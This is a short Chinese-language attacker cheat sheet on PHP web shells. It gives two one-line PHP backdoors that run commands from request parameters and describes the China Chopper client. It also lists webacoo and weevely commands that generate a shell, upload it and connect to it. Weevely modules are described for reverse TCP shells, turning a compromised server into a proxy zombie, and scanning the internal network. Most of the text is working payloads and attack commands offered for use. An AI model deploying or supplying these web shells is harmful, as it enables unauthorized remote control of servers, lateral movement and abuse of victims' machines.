php經典一句話: <?php echo shell_exec($_GET['cmd']);?>
中國菜刀:
官網:www.maicaidao.co
原理:上傳一句話(<?php @eval($_POST['我是密碼']);?>)至服務器端,再用中國菜刀客戶端(圖形化界面)去連接服務器
webacoo(kali):
特點:傳輸的數據包裹在cookie中,並非http包體內,起到一定繞過作用
原理:生成webshell,上傳至目標服務器,再拿webacoo去連接該webshell,返回可以執行系統命令的shell
缺點:不可設置專屬連接密碼
生成webshell: webacoo -g -o a.php
連接webshell: webacoo -t -u http://192.168.1.1/a.php
weevely(kali):
原理:生成webshell,上傳至目標服務器,再拿weevely去連接該webshell,返回可以執行系統命令的shell
生成webshell:weevely generate 密碼 a.php
連接webshell:weevely http://192.168.1.1/a.php 密碼
特點:連接到目標服務器webshell后還可以調用內置的N多模塊,在shell下輸入help查看模塊,直接在shell下輸入模塊名稱使用模塊
30多個管理模塊舉例:
1、執行系統命令、瀏覽文件系統
2、檢查服務器常見配置錯誤
3、創建正向、反向TCP Shell連接
4、將目標服務器作為代理http服務器(肉雞) ====>只需要在連接到的shell中輸入net_proxy即可打開代理,此時會在本地監聽127.0.0.1:8080,瀏覽器設置為該代理后所有流量將走目標服務器
5、從目標計算機運行端口掃描,滲透內網